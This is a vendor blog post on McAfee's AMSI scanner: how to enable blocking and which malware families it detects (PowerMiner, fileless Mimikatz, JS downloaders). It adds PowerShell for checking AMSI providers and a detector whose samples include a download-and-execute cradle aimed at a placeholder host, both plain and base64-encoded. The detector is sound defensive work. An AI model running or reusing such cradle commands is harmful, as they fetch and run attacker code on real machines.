McAfee AMSI Integration Protects Against Malicious Scripts

Following on from the McAfee Protects against suspicious email attachments blog, this blog describes how the AMSI (Antimalware Scan Interface) is used within the various McAfee Endpoint products. The AMSI scanner within McAfee ENS 10.6 has already detected over 650,000 pieces of malware since the start of 2019. This blog shows you how to enable it, and explains why it should be enabled, by highlighting some of the malware we are able to detect with it.

ENS 10.6 and Above
The AMSI scanner scans scripts at the point they are executed. This lets the scanner examine the de-obfuscated content of the script and scan it using DAT content. This is useful because the original scripts can be heavily obfuscated and are difficult to detect generically, as shown in the figure below:

Figure 1 – Obfuscated VBS script being de-obfuscated with AMSI

Enable the Scanner
By default, the AMSI scanner is set to observe mode. This means that the scanner is running but it will not block any detected scripts; instead the detection appears in the ENS log and Event Viewer as shown below:

Figure 2 – Would Block in the Event log

To actively block the detected threats, you need to de-select the following option in the ENS settings:

Figure 3 – How to enable Blocking


Once this has been done, the event log will show that the malicious script has now been blocked:

Figure 4 – Action Blocked in Event Log
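To check the same wiring from the command line, the following PowerShell is an added example that is not McAfee's code and not part of the original post. It lists the AMSI providers registered on the host (Windows keeps them as COM classes under HKLM\SOFTWARE\Microsoft\AMSI\Providers) and submits caller-supplied text to AMSI through the public AmsiScanString API so an administrator can see the verdict the registered scanner returns. The application name AmsiCheck, the content name ens-amsi-check and the file name sample-to-scan.txt are arbitrary labels chosen for this example.

```powershell
# Added example, not McAfee code: confirm which AMSI providers are registered on this
# host and ask AMSI for a verdict on caller-supplied text through the public API.

# Windows registers AMSI providers as COM classes under this key; each subkey name is
# the provider's CLSID and its InprocServer32 entry points at the scanning DLL.
function Get-AmsiProvider {
    $root = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path $root)) { return }
    Get-ChildItem -Path $root | ForEach-Object {
        $clsid = $_.PSChildName
        $class = "HKLM:\SOFTWARE\Classes\CLSID\$clsid"
        [pscustomobject]@{
            Clsid = $clsid
            Name  = if (Test-Path $class) { (Get-ItemProperty -Path $class).'(default)' } else { $null }
            Dll   = if (Test-Path "$class\InprocServer32") { (Get-ItemProperty -Path "$class\InprocServer32").'(default)' } else { $null }
        }
    }
}

# Minimal P/Invoke surface for amsi.dll (signatures as declared in amsi.h).
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class AmsiNative {
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiInitialize(string appName, out IntPtr context);
    [DllImport("amsi.dll")]
    public static extern void AmsiUninitialize(IntPtr context);
    [DllImport("amsi.dll", CharSet = CharSet.Unicode)]
    public static extern int AmsiScanString(IntPtr context, string content, string contentName,
                                            IntPtr session, out uint result);
}
'@

function Test-AmsiScan {
    param(
        [Parameter(Mandatory)][string]$Content,
        [string]$ContentName = 'ens-amsi-check'   # arbitrary label for this example
    )
    $ctx = [IntPtr]::Zero
    $hr  = [AmsiNative]::AmsiInitialize('AmsiCheck', [ref]$ctx)   # app name is arbitrary
    if ($hr -ne 0) { throw ('AmsiInitialize failed: 0x{0:X8}' -f $hr) }
    try {
        $raw = [uint32]0
        $hr  = [AmsiNative]::AmsiScanString($ctx, $Content, $ContentName, [IntPtr]::Zero, [ref]$raw)
        if ($hr -ne 0) { throw ('AmsiScanString failed: 0x{0:X8}' -f $hr) }
        # AMSI_RESULT ranges from amsi.h: 0 clean, 1 not detected,
        # 0x4000-0x4FFF blocked by administrator policy, 0x8000 and above detected.
        $verdict = if ($raw -ge 0x8000) { 'Detected' }
                   elseif ($raw -ge 0x4000 -and $raw -le 0x4FFF) { 'BlockedByAdmin' }
                   else { 'Clean' }
        [pscustomobject]@{ ContentName = $ContentName; RawResult = $raw; Verdict = $verdict }
    }
    finally {
        [AmsiNative]::AmsiUninitialize($ctx)
    }
}

# Usage: list providers, then scan text read from a file supplied by the operator.
Get-AmsiProvider | Format-Table -AutoSize
# Test-AmsiScan -Content (Get-Content -Raw -Path .\sample-to-scan.txt)
```

PowerShell itself submits every script it runs to AMSI, so supply the text to be tested through the -Content parameter (for example from a file) rather than pasting a detection test string into this script. Keep the observe-mode behaviour described above in mind when reading the verdict: a provider left in observe mode records a "Would Block" event rather than blocking, so check the ENS event log alongside the value returned here.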

In the Wild
Since January 2019, we have observed over 650,000 detections and this is shown in the IP Geo Map below:

Figure 5 – Geo Map of all AMSI detections since January 2019

We are now able to block some of the most prevalent threats with AMSI. These include PowerMiner, Fileless MimiKatz and JS downloader families such as JS/Nemucod.

The sections below describe how these families operate, and how their infections have spread across the globe.

PowerMiner
PowerMiner is cryptocurrency-mining malware whose purpose is to infect as many machines as possible and mine Monero. The initial infection vector is phishing emails which contain a batch file. Once executed, this batch file downloads a malicious PowerShell script which then begins the infection process.

The infection flow is shown in the graph below:

Figure 6 – Infection flow of PowerMiner

With the AMSI scanner, we can detect the malicious PowerShell script and stop the infection from occurring. The Geo IP Map below shows how this malware has spread across the globe:

Figure 7 – Geo Map of PS/PowerMiner!ams detections since January 2019

McAfee Detects PowerMiner as PS/PowerMiner!ams.a.

Fileless Mimikatz
Mimikatz is a tool which enables the extraction of passwords from the Windows LSASS process. Mimikatz was previously used as a standalone tool; however, malicious scripts have been created which download Mimikatz into memory and then execute it without it ever being written to the local disk. An example of a fileless Mimikatz script is shown below (note: this can be heavily obfuscated):

Figure 8 – Fileless Mimikatz PowerShell script

The Geo IP Map below shows how fileless Mimikatz has spread across the globe:

Figure 9 – Geo IP Map of PS/Mimikatz detections since January 2019

McAfee detects this malicious script as PS/Mimikatz.a, PS/Mimikatz.b and PS/Mimikatz.c.
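The fileless pattern described above also leaves a recognisable shape in PowerShell's own logs. The following is an added example (not McAfee's code and not from the original post) that triages script text for the two halves of that pattern, a remote fetch and an in-memory execute, and first expands any -EncodedCommand argument so the regexes see the same plaintext the engine would run, much as AMSI sees the de-obfuscated script. The three sample lines are constructed for this example; in practice the input would be the ScriptBlockText of Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log.

```powershell
# Added example, not McAfee code: triage script text for the "fetch remotely,
# execute in memory" shape of fileless loaders. Sample input below is constructed.

function Expand-EncodedCommand {
    param([string]$Text)
    # -EncodedCommand carries UTF-16LE text as base64; replace it with the plaintext
    # so the regexes below see what the engine would actually execute.
    $pattern = '(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})'
    [regex]::Replace($Text, $pattern, [System.Text.RegularExpressions.MatchEvaluator]{
        param($m)
        try   { [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value)) }
        catch { $m.Value }   # not valid base64: leave the text untouched
    })
}

function Find-InMemoryLoader {
    param([string[]]$ScriptBlocks)
    # Half one: something that pulls content from the network.
    $fetch   = '(?i)DownloadString|DownloadData|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|WebClient'
    # Half two: something that runs that content without writing it to disk.
    $execute = '(?i)Invoke-Expression|\biex\b|\[Reflection\.Assembly\]::Load|Invoke-Mimikatz'
    foreach ($block in $ScriptBlocks) {
        $plain = Expand-EncodedCommand -Text $block
        $hits = @()
        if ($plain -match $fetch)   { $hits += 'remote-fetch' }
        if ($plain -match $execute) { $hits += 'in-memory-execute' }
        [pscustomobject]@{
            Suspicious = ($hits.Count -eq 2)   # only flag when both halves are present
            Indicators = ($hits -join ',')
            Decoded    = ($plain -ne $block)   # true when an encoded command was expanded
            Text       = $plain
        }
    }
}

# Constructed samples: a benign file download (fetch only), the download-cradle
# shape, and the same cradle hidden behind -enc (base64 of UTF-16LE "iex (iwr u)").
$samples = @(
    "Invoke-WebRequest -Uri https://updates.example.invalid/manifest.json -OutFile C:\Temp\manifest.json",
    "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/im.ps1')",
    "powershell.exe -enc aQBlAHgAIAAoAGkAdwByACAAdQApAA=="
)
Find-InMemoryLoader -ScriptBlocks $samples | Format-Table Suspicious, Indicators, Decoded, Text -AutoSize
```

Only the second and third samples come back Suspicious: the first fetches to disk and never executes anything, while the third is only caught because the encoded argument was expanded first, which is the same reason the page stresses scanning after de-obfuscation.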

JS/Downloader
JS downloaders are usually spread via email. The purpose of these JavaScript files is to download further payloads such as ransomware, password stealers and backdoors to further exploit the compromised machine. The infection chain is shown below, along with an example phishing email:

Figure 10 – Infection flow of JS/Downloader

Figure 11 – Example phishing email distributing JS/Downloader

Below is the IP Geo Map of AMSI JS/Downloader detections since January 2019:

Figure 12 – Geo Map of AMSI-FAJ detections since January 2019

The AMSI scanner detects this threat as AMSI-FAJ.

MVISION Endpoint and ENS 10.7
MVISION Endpoint and ENS 10.7 (not currently released) will use Real Protect Machine Learning to detect PowerShell AMSI-generated content.
